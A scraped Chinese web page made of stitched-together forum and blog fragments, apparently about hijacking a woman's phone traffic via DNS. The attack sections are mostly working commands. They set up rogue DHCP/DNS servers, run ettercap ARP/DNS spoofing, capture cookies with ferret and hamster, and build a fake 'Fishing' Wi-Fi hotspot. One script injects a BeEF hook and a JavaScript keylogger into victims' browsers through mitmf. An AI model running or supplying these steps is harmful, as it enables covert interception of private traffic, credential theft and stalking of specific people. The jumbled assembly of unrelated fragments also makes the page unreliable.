怎么通过kaili 电信dns劫持持 获取女神手机屏幕

kaili 2.0 虚拟机修改ip
kaili 2.0 虚拟机修改ip
编辑:www.fx114.net
本篇文章主要介绍了"kaili 2.0 虚拟机修改ip ",主要涉及到kaili 2.0 虚拟机修改ip 方面的内容,对于kaili 2.0 虚拟机修改ip 感兴趣的同学可以参考一下。
第一步:将虚拟机设置为桥接状态,并勾选上复制物理网络连接状态
第二步:修改 interfaces文件
添加以下内容:
iface eth0 inet static #静态ip
address 172.0.0.25#内网IP
netmask 255.255.255.0#子网掩码
network 172.0.0.0#网络地址
broadcast 172.0.0.255#广播地址
gateway 172.0.0.1#网关地址
第三步:修改DNS
命令:vi /etc/resolv.conf
将nameserver改为你的DNS
第四步:重启网卡
命令:/etc/init.d/networking restart
一、不得利用本站危害国家安全、泄露国家秘密,不得侵犯国家社会集体的和公民的合法权益,不得利用本站制作、复制和传播不法有害信息!
二、互相尊重,对自己的言论和行为负责。
本文标题:
本页链接:只需一步,快速开始
Linux渗透教程(带你玩转Kali附安卓下Kali渗透,劫持等)
查看: 15595|回复: 356
主题好友积分
├─1.一见钟情-Kali的前世今生
│& && &1.Kali的前世今生.doc
│& && &1.Kali的前世今生.exe& && &
│& && && &
├─2.学而不厌-基本渗透方法与理论
│& && &2.基本渗透方法与理论.doc
│& && &2.基本渗透方法与理论.exe
├─3.万事开头难-Kali的安装与初始设置
│& && &3.1.kali的安装.exe
│& && &3.2.kali的安装.exe
│& && &3.3.网卡配置.exe
│& && &3.4.vmware-tools安装.exe
│& && &Kali的安装与初始设置.doc
├─4.知己知彼百战不殆-信息收集
│& && &4.1.理论知识.exe
│& && &4.2.实战体验.exe
│& && &4.3.祭神器.exe
│& && &信息收集.doc
├─5.找对象-目标发现
│& && &5.1.目标发现.exe
│& && &5.2.操作系统指纹识别.exe
│& && &目标发现.doc
├─6.曲线救国-目标枚举
│& && &6.1.理论知识.exe
│& && &6.2.扫你没商量.exe
│& && &6.3.漏洞脚本加载.exe
│& && &目标枚举.docx
├─7.发现美的眼睛-漏洞映射
│& && &7.不一样的思路.docx
│& && &7.不一样的思路.exe
├─8.人类致命弱点-社会工程学
│& && &8.刺向敌人的心脏.txt
│& && &8.刺向敌人的心脏.exe
├─9.实践是检验真理的唯一途径-漏洞利用
│& && &9.1.远程攻击.exe
│& && &9.2.离线攻击.exe
│& && &9.3.数据库配置.exe
│& && &postgresql.txt
│& && &漏洞利用.docx
├─10.屌丝逆袭高富帅-提权
│& && &10.屌丝逆袭高富帅.txt
│& && &10.屌丝逆袭高富帅.exe
├─11.芝麻开门-持续控制目标
│& && &11.芝麻开门.txt
│& && &11.芝麻开门.exe
└─12.学无止境-附录
& & ├─1.DNS欺骗
& & │& && &12.1.DNS欺骗.exe
& & │& && &
& & ├─2.一本走天下-无线密码破解
& & │& && &12.2.WIFI密码破解.exe
& & │& && &WIFI破解.txt
& & │& && &
& & ├─3.双剑合璧-burpsuite插件实现sqlmapGUI
& & │& && &12.3.双剑合璧-burpsuite插件实现sqlmapGUI.exe
& & │& && &tools.zip
& & │& && &双剑合璧-burpsuite插件实现sqlmapGUI.txt
& & │& && &
& & ├─4.安卓也能玩渗透?-Kali on
& & │& && &12.4.Kali on android.exe
& & │& && &Kali on android.txt
& & │& && &
& & └─5.安卓渗透有大用-dsploit简单使用
& && && && &12.5.1.百度会话劫持.exe
& && && && &12.5.2.新浪微博会话劫持.exe
│& && && & 12.5.3.其他功能.exe
课程下载地址: 游客,如果您要查看本帖隐藏内容请
本帖被以下淘专辑推荐:
& |主题: 1, 订阅: 0
主题好友积分
太牛的资料 龙天很靠谱
主题好友积分
哈哈,早就装过,但是不会玩!
主题好友积分
我看不错噢 谢谢楼主!龙天技术论坛越来越好!
主题好友积分
这个帖子不回对不起自己!我想我是一天也不能离开龙天技术论坛。
主题好友积分
主题好友积分
主题好友积分
楼主太厉害了!楼主,I*老*虎*U!我觉得龙天技术论坛真是个好地方!
主题好友积分
楼主太厉害了!楼主,I*老*虎*U!我觉得龙天技术论坛真是个好地方!
主题好友积分
谢谢分享!
主题好友积分
主题好友积分
回复一下看看
主题好友积分
感谢分享.....
主题好友积分
老大千秋万代,一统江湖
主题好友积分
就是需要这样的教程& &哦买噶~
主题好友积分
恩一定要学习& &
主题好友积分
看看怎么样的啊
主题好友积分
这个帖子不回对不起自己!我想我是一天也不能离开龙天技术论坛。
主题好友积分
擦大湿速度好快啊
主题好友积分
黄大仙嘻嘻嘻啊打开微信“扫一扫”,打开网页后点击屏幕右上角分享按钮
前段时间redrain大神和一个学院派教授争执最后连国民老公—-王思聪都来观战啦!! 局域网再次进入了公众的视野~
局域网内无隐私! 这两天没什么事情查了查中间人攻击
结果发现网络上面的资料并不是很完全
所以写了这篇文章给小黑们进行参考 本人水平有限
大牛们不喜勿喷。。。
本次的中间人攻击使用DHCP来劫持DNS 个人感觉测试了几回后效果比arp欺骗要好很多
路由器:192.168.101.202
netmask:255.255.255.0
本机地址:192.168.101.108
需要的工具
Closurether
Node的安装
wget http://nodejs.org/dist/v0.8.7/node-v0.8.7.tar.gz
tar zxvf node-v0.8.7.tar.gz
cd node-v0.8.7
./configure
make install
wget http://nodejs.org/dist/v0.8.7/node-v0.8.7.tar.gz&tar zxvf node-v0.8.7.tar.gz&cd node-v0.8.7&./configure&make install
安装closurether
这个软件是做DNS的转发以保证DHCP的客户端的正常上网
node安装完成后则能执行
npm install -g closurether
npm install -g closurether
一般的会出现错误
SSL Error: SELF_SIGNED_CERT_IN_CHAIN
解决办法:
root@kali:~/node-v0.8.7# npm install npm -g --ca=null
root@kali:~/node-v0.8.7# npm config set ca=""
root@kali:~/node-v0.8.7# npm install npm -g --ca=null&root@kali:~/node-v0.8.7# npm config set ca=""
npm install -g closurether
npm install -g closurether
一直在等待,,果断关掉!!
root@kali:~/node-v0.8.7#make install
root@kali:~/node-v0.8.7#make install
执行closurether 出现
说明closurether 安装成功
DHCP服务器的配置
apt-get install dhcp3-server
apt-get install dhcp3-server
注意:我们通过路由器的DHCP给我们分配ip地址 所以这块的interface不用配置成静态
cd /etc/dhcp
mv dhcpd.conf dhcpd.conf..stock
nano dhcpd.conf
cd /etc/dhcp&mv dhcpd.conf dhcpd.conf..stock&nano dhcpd.conf
配置如下:
option domain-name-servers 192.168.101.108;
option domain-name-servers 192.168.101.108;
#DNS服务器 本机地址
default-lease-time 6000;
max-lease-time 800000;
ddns-update-
log-facility local7;
default-lease-time 6000;&max-lease-time 800000;&ddns-update-style none;&authoritative;&log-facility local7;
#subnet配置网络的基本信息
subnet 192.168.101.0 netmask 255.255.255.0{
range 192.168.101.1 192.168.101.254;
subnet 192.168.101.0 netmask 255.255.255.0{&range 192.168.101.1 192.168.101.254;
#DHCP分配的地址池
option routers 192.168.101.202;
option routers 192.168.101.202;
option broadcast-address 192.168.101.255;
option broadcast-address 192.168.101.255;
default-lease-time 6000;
max-lease-time 8000000;
option domain-name-servers 192.168.101.108;
default-lease-time 6000;&max-lease-time 8000000;&option domain-name-servers 192.168.101.108;
#DNS服务器
/etc/init.d/isc-dhcp-server start
/etc/init.d/isc-dhcp-server start
启用DHCP服务
如果出错则从/var/log/syslog 查看错误提示
Closurether进行DNS转发
root@kali:~# closurether
root@kali:~# closurether
启动后则能看到劫持到的DHCP客户端的详细DNS记录
找到extern这个文件
find / -name extern.js
nano extern.js
find / -name extern.js&nano extern.js
加入注入内容
用tcpdump窃听网络接口
执行 tcpdump -i eth0 -w /usr/share/hamster-sidejack/test.cap
执行 tcpdump -i eth0 -w /usr/share/hamster-sidejack/test.cap
这个过程可能相当的漫长。。。
还是会拼人品的。。。
不过耐心会有更多的收获哦!!
监听结束后用ferret处理cap
这里我要吐槽一下 ferret这个东西太坑了
只在32位的kali上有
64位是没有的
这里千万要注意 不要看到ferret就去apt-get install ferret!!!!!
软件源中的ferret和我们用的kali自带的ferret不是一个软件!!
一旦安装就覆盖掉了原来的软件
更坑的是网上找了好多帖子都没有这个小软件!
从/usr/bin中将ferret拷到/usr/share/hamster-sidejack
从/usr/share/hamster-sidejack中执行
ferret –r /usr/share/hamster-sidejack/test.cap
ferret –r /usr/share/hamster-sidejack/test.cap
查看hamster.txt 如果有内容是DNS的记录则说明执行成功
然后将hamster.txt改名为ferret.txt
启用hamster代理 查看劫持到的cookies
需要先清理本机cookies 以免冲突
root@kali:~#cd /usr/share/hamster-sidejack
//使hamster从/usr/share/hamster-sidejack查找ferret.txt
root@kali:~#cd /usr/share/hamster-sidejack
//使hamster从/usr/share/hamster-sidejack查找ferret.txt
root@kali:~#hamster
root@kali:~#hamster
修改路由器的代理设置 访问
提交adapters(适配器)就可看到
对于这种攻击并没有什么好的办法解决
只有使用静态的ip地址分配
可是普通的家庭网络有几个人不使用DHCP而静态配置网络呢
配置静态的DNS服务器可有效的防止DNS劫持
参考资料:
91ri.org:本来关于内网欺骗的文章已经很多了,所以本文原来是不准备发布的,但后来听说作者是个高中生,我们惊讶高中生在学业压力之余还能对技术有所研究,同时关注业界动态,这让我们回想起自己“不堪回首”的高中时代。所以我们还是发了这篇,也希望能鼓励下这位小朋友继续努力。本文所涉程序git上都有,请自行查找。后使用快捷导航没有帐号?
局域网中的dns劫持攻击
摘要: 场景一、劫持到挂马页面利用ie flash漏洞强x内网里面的主机,场景二、网页钓鱼 场景三、嗅探目标主机上网流量 场景四、恶搞蹭网者搭建环境开启kali linux自带的apache 需要搭建钓鱼网站用到数据库的开启即可,这里演 ...
场景一、劫持到挂马页面利用ie flash漏洞强x内网里面的主机,场景二、网页钓鱼 场景三、嗅探目标主机上网流量 场景四、恶搞蹭网者搭建环境开启kali linux自带的apache 需要搭建钓鱼网站用到数据库的开启即可,这里演示只开启apache放一个单页面root@kali:~# service apache2 start进入apache默认网站目录 /var/www/html 编辑 index.html 页面下一步root@kali:~# gedit /etc/ettercap/etter.dns这个台是目标主机 192.168.187.129执行命令 ettercap -i eth0 -T -P dns_spoof -M arp /192.168.187.129///主机所有的访问请求都会被劫持!
特别推荐:欲深入学习电脑维护、网络编程与黑客攻防,请点击这里
,免费学VIP公开课、论坛与QQ群技术交流,黑基14年技术经验,让您少走弯路、事半功倍!
声明:本文搜集整理自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,请我们一起为维护良好的互联网秩序而努力,谢谢!联系方式见网站首页右下角。
刚表态过的朋友 ()
上一篇:下一篇:文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。请不要做一只咖啡馆里安静的猥琐大叔。
从至少一年前我就一直想在自己跑kali的笔记本上架个钓鱼热点。然而由于网上的教程的nat写得有问题,别人写好的脚本和我电脑有些互不待见,最接近成功的一次只做到了qq能聊天,百度都上不去。
而最近忽然意识到了问题的所在,成功实现了建立wifi热点,dns劫持,js注入,图片嗅探,和BEEF结合对用户浏览器进行攻击测试。
故写此文分享给大家,希望与之前的我有一样困惑的同志们能有所收获。
工具:isc-dhcp-Aircrack-ng套件;iptables
建立过程:
首先写dhcp配置文件/etc/dhcp/dhcpd.conf
写入如下内容:
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
range 10.0.0.10 10.0.0.100;
这里以10.0.0.1作为网关和dns服务器地址。
然后我们处理无线网卡
ifconfig wlan1 down #wlan1修改成你的网卡
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airmon-ng start wlan1
上述命令可以防止出现:Error: Got channel -1, expected a value & 0.
然后用airbase建立热点
airbase-ng -e Fishing -c 11 mon0
热点的网络流量会被虚拟到at0这块网卡上面
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
打开ip转发
echo 1 & /proc/sys/net/ipv4/ip_forward
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
service isc-dhcp-server start
然后可以试着用手机连接,应该可以连上但上不了网
于是配置NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356 #修改最大报文段长度
注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)
(这里可能还是DNS错误,请看后文中的dns代理服务器搭建)
工具:dnschef
dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53
上述命令是以ip10.0.0.1(上文中的fakeap网关和DNS的ip)建立dns,对于所有请求转发到210.73.64.1进行解析。显然这只是个“代理”并没有劫持的功效
于是我们进化:
dnschef --, --fakeip=10.0.0.1 -i 10.0.0.1 --nameserver 210.73.64.1#53
把淘宝和百度解析到本机了。
当然可以把更多规则写在文件里:
剩下的大家自由发挥吧。
p.s:这个和后文中mitmf冲突,mitmf识别http协议中的目的主机,进行转发,不受这个dns伪造影响。
这是一个很好玩的功能
工具:driftnet
driftnet -i at0
然后程序会打开一个小窗口显示所有传输的图片:
单击图片保存到/
当然可以开启 Adjunct mode:
driftnet -i at0 -a
直接保存图片并显示文件名。
劫持Web流量
这个更好玩
工具:BEEF;iptables
先把80端口的流量劫持走(这里10000是mitmf默认监听端口)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
然后打开mitmf
mitmf -i at0 --replace --search-str aaaaa --replace-str bbbbb#把所有网页中的aaaaa替换成bbbbb
上图百度了aaaaa
好吧不要恶作剧了,上干货
mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger
mitmf在这里注入了js键盘记录器
和beef的攻击测试脚本,其余的攻击方式(比如javapwn)可以参考/tools/45796.html
最后用BEEF测试用户浏览器吧!
/usr/share/beef-xss/beef
浏览器打开http://127.0.0.1:3000/ui/panel ,初始用户名和密码都是beef
BEEF过于高深我还没玩得很清楚请大家自行探索。对了,不要忘了抓包
最后是我写的脚本
#清空iptables
iptables -t nat -F
iptables -t nat -X
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT
iptables -t mangle -F
iptables -t mangle -X
iptables -t mangle -P PREROUTING ACCEPT
iptables -t mangle -P INPUT ACCEPT
iptables -t mangle -P FORWARD ACCEPT
iptables -t mangle -P OUTPUT ACCEPT
iptables -t mangle -P POSTROUTING ACCEPT
iptables -F
iptables -X
iptables -P FORWARD ACCEPT
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t raw -F
iptables -t raw -X
iptables -t raw -P PREROUTING ACCEPT
iptables -t raw -P OUTPUT ACCEPT
airmon-ng stop mon0
ifconfig wlan1 down #wlan1修改成你的网卡
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airmon-ng start wlan1 &
gnome-terminal -x bash -c &airbase-ng -e Fishing -c 11 mon0& #按需求修改
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 & /proc/sys/net/ipv4/ip_forward
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
gnome-terminal -x bash -c &dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53&
#打开beef并进行80js键盘记录
gnome-terminal -x bash -c &mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger&
&&相关文章推荐
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
访问:8056次
排名:千里之外
(1)(1)(8)(2)}

我要回帖

更多关于 dns被劫持 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信